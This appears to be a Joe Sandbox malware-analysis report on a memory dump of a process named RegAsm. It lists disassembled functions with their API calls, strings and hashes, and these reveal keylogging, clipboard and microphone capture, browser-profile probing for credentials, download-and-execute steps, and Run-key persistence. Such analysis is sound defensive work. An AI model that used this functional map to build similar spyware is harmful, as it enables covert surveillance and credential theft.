Function 00443A33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
Opcode Fuzzy Hash: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568

Uniqueness

Uniqueness Score: -1.00%

Function 00443AB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
Opcode Fuzzy Hash: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169

Uniqueness

Uniqueness Score: -1.00%

Function 0041C485 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
GetFileSize.KERNEL32(00000000,00000000), ref: 0041C4B2
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4D7
CloseHandle.KERNEL32(00000000), ref: 0041C4E5

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
Opcode Fuzzy Hash: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A

Uniqueness

Uniqueness Score: -1.00%

Function 0041C1DD Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
CloseHandle.KERNEL32(00000000), ref: 0041C233
CloseHandle.KERNEL32(00000000), ref: 0041C23B

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseHandleOpenProcess
String ID:
API String ID: 39102293-0
Opcode ID: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
Opcode Fuzzy Hash: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679

Uniqueness

Uniqueness Score: -1.00%

Function 00439863 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0043987A

Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC

_UnwindNestedFrames.LIBCMT ref: 00439891
___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
CallCatchBlock.LIBVCRUNTIME ref: 004398C7

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004193E3 Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 004193F0
GetSystemMetrics.USER32 ref: 004193F6
GetSystemMetrics.USER32 ref: 004193FC
GetSystemMetrics.USER32 ref: 00419402

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785

Uniqueness

Uniqueness Score: -1.00%

Function 00438F31 Relevance: 6.0, APIs: 4, Instructions: 14COMMON

Download Yara Rule

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B

Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F

Uniqueness

Uniqueness Score: -1.00%

Function 00442C5D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00442CED

Strings

pow, xrefs: 00442CC5, 00442CE2

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F

Uniqueness

Uniqueness Score: -1.00%

Function 0040B748 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776

__Init_thread_footer.LIBCMT ref: 0040B797

Strings

[End of clipboard], xrefs: 0040B7D9
[Text copied to clipboard], xrefs: 0040B7E6

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Init_thread_footer__onexit
String ID: [End of clipboard]$[Text copied to clipboard]
API String ID: 1881088180-3686566968
Opcode ID: 1452d6304ce3f0295fff478f129f85fb29fa27eb4ce50424bc2e0dcad400a5b7
Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
Opcode Fuzzy Hash: 1452d6304ce3f0295fff478f129f85fb29fa27eb4ce50424bc2e0dcad400a5b7
Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C

Uniqueness

Uniqueness Score: -1.00%

Function 00451B37 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12

Strings

OCP, xrefs: 00451B8B
ACP, xrefs: 00451B55

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C

Uniqueness

Uniqueness Score: -1.00%

Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087

Strings

KeepAlive | Enabled | Timeout: , xrefs: 0040501F

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: KeepAlive | Enabled | Timeout:
API String ID: 481472006-1507639952
Opcode ID: 94476530adddf729a94900e8ced82c90480f790f78fd79a0466f5c5f7008df8a
Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
Opcode Fuzzy Hash: 94476530adddf729a94900e8ced82c90480f790f78fd79a0466f5c5f7008df8a
Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF

Uniqueness

Uniqueness Score: -1.00%

Function 0041663B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00416640
URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2

Strings

!D@, xrefs: 00417089

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DownloadFileSleep
String ID: !D@
API String ID: 1931167962-604454484
Opcode ID: 07a7ba679a22719b007f27f942da87136b12813d5d7402b4186b0f1ae2008f5d
Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
Opcode Fuzzy Hash: 07a7ba679a22719b007f27f942da87136b12813d5d7402b4186b0f1ae2008f5d
Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A

Uniqueness

Uniqueness Score: -1.00%

Function 0041B4EF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(00000000), ref: 0041B509

Strings

%02i:%02i:%02i:%03i , xrefs: 0041B51E
| , xrefs: 0041B53C

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: | $%02i:%02i:%02i:%03i
API String ID: 481472006-2430845779
Opcode ID: 0b58fb712609a629be2860926311a3a1d9782cd388fbf364b696734300abae58
Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
Opcode Fuzzy Hash: 0b58fb712609a629be2860926311a3a1d9782cd388fbf364b696734300abae58
Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A

Uniqueness

Uniqueness Score: -1.00%

Function 0041AD17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C

Strings

hYG, xrefs: 0041AD46
alarm.wav, xrefs: 0041AD27

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: alarm.wav$hYG
API String ID: 1174141254-2782910960
Opcode ID: b09d6ad5bf3bcd9657e8e305d729ed8905f01874a871c29a92ebbed67346a3ad
Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
Opcode Fuzzy Hash: b09d6ad5bf3bcd9657e8e305d729ed8905f01874a871c29a92ebbed67346a3ad
Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F

Uniqueness

Uniqueness Score: -1.00%

Function 0040B051 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

CloseHandle.KERNEL32(?), ref: 0040B0B4
UnhookWindowsHookEx.USER32 ref: 0040B0C7

Strings

Online Keylogger Stopped, xrefs: 0040B061, 0040B069, 0040B090

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
String ID: Online Keylogger Stopped
API String ID: 1623830855-1496645233
Opcode ID: 14d91ba3cc0780b58bc46c93ea61c46197eef5bd77683ed78bbf46c7536d2da3
Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
Opcode Fuzzy Hash: 14d91ba3cc0780b58bc46c93ea61c46197eef5bd77683ed78bbf46c7536d2da3
Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE

Uniqueness

Uniqueness Score: -1.00%

Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

waveInPrepareHeader.WINMM(?,00000020,?), ref: 00401849
waveInAddBuffer.WINMM(?,00000020), ref: 0040185F

Strings

XMG, xrefs: 004017F8

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: wave$BufferHeaderPrepare
String ID: XMG
API String ID: 2315374483-813777761
Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00448AE6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32

Strings

JD, xrefs: 00448B29, 00448B16
IsValidLocaleName, xrefs: 00448AF7, 00448B01

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LocaleValid
String ID: IsValidLocaleName$JD
API String ID: 1901932003-2234456777
Opcode ID: 8ed56ec59b6d4db5e47e15cf77ebd157549768ac78bfa39ea2b76d2b56dc7c94
Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
Opcode Fuzzy Hash: 8ed56ec59b6d4db5e47e15cf77ebd157549768ac78bfa39ea2b76d2b56dc7c94
Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E

Uniqueness

Uniqueness Score: -1.00%

Function 0040C4C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000), ref: 0040C4F6

Strings

UserProfile, xrefs: 0040C4CA
\AppData\Local\Google\Chrome\, xrefs: 0040C4E0

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: UserProfile$\AppData\Local\Google\Chrome\
API String ID: 1174141254-4188645398
Opcode ID: d6df45e634b6afbccae3fd0fe3c480d2b3110c006c85663e0c742c56e2ad0e6a
Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
Opcode Fuzzy Hash: d6df45e634b6afbccae3fd0fe3c480d2b3110c006c85663e0c742c56e2ad0e6a
Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE

Uniqueness

Uniqueness Score: -1.00%

Function 0040C526 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000), ref: 0040C559

Strings

UserProfile, xrefs: 0040C52D
\AppData\Local\Microsoft\Edge\, xrefs: 0040C543

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: UserProfile$\AppData\Local\Microsoft\Edge\
API String ID: 1174141254-2800177040
Opcode ID: 6b2bbaa95f382bae7588de9092395feb5a0607f01bf817232799a9fc0a715970
Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
Opcode Fuzzy Hash: 6b2bbaa95f382bae7588de9092395feb5a0607f01bf817232799a9fc0a715970
Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE

Uniqueness

Uniqueness Score: -1.00%

Function 0040C589 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000), ref: 0040C5BC

Strings

\Opera Software\Opera Stable\, xrefs: 0040C5A6
AppData, xrefs: 0040C590

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: AppData$\Opera Software\Opera Stable\
API String ID: 1174141254-1629609700
Opcode ID: eb22ca10a5fa219f5c4dc8a07dafa017cd8c89abc0008a47340e43b7a4e1140f
Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
Opcode Fuzzy Hash: eb22ca10a5fa219f5c4dc8a07dafa017cd8c89abc0008a47340e43b7a4e1140f
Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA

Uniqueness

Uniqueness Score: -1.00%

Function 0040B646 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000011), ref: 0040B64B

Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
Part of subcall function 0040A3E0: GetKeyboardLayout.USER32 ref: 0040A429
Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
Part of subcall function 0040A3E0: ToUnicodeEx.USER32 ref: 0040A461
Part of subcall function 0040A3E0: ToUnicodeEx.USER32 ref: 0040A4C1

Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662

Strings

[AltR], xrefs: 0040B681
[AltL], xrefs: 0040B68D

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
String ID: [AltL]$[AltR]
API String ID: 2738857842-2658077756
Opcode ID: 440f2a55e07645c447245340f9966782ae35bb9e0b4477c7a4060e7ad180e5fa
Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
Opcode Fuzzy Hash: 440f2a55e07645c447245340f9966782ae35bb9e0b4477c7a4060e7ad180e5fa
Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF

Uniqueness

Uniqueness Score: -1.00%

Function 0044ECEC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E

Strings

uD, xrefs: 0044ED05

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: uD
API String ID: 0-2547262877
Opcode ID: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
Opcode Fuzzy Hash: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49

Uniqueness

Uniqueness Score: -1.00%

Function 0041618A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8

Strings

!D@, xrefs: 00417089
open, xrefs: 004161A2

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExecuteShell
String ID: !D@$open
API String ID: 587946157-1586967515
Opcode ID: ef1b3a0f4602e6d199ecf0e45d17a7acf077c1a045a33f1301243906c424f492
Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
Opcode Fuzzy Hash: ef1b3a0f4602e6d199ecf0e45d17a7acf077c1a045a33f1301243906c424f492
Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A

Uniqueness

Uniqueness Score: -1.00%

Function 0040B6A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000012), ref: 0040B6A5

Strings

[CtrlL], xrefs: 0040B6D3
[CtrlR], xrefs: 0040B6C2

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: State
String ID: [CtrlL]$[CtrlR]
API String ID: 1649606143-2446555240
Opcode ID: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
Opcode Fuzzy Hash: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF

Uniqueness

Uniqueness Score: -1.00%

Function 0040E79F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776

__Init_thread_footer.LIBCMT ref: 00410F29

Strings

,kG, xrefs: 00410F04
0kG, xrefs: 00410F31

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Init_thread_footer__onexit
String ID: ,kG$0kG
API String ID: 1881088180-2015055088
Opcode ID: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
Opcode Fuzzy Hash: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D

Uniqueness

Uniqueness Score: -1.00%

Function 00413A23 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00413A31
RegDeleteValueW.ADVAPI32 ref: 00413A45

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DeleteOpenValue
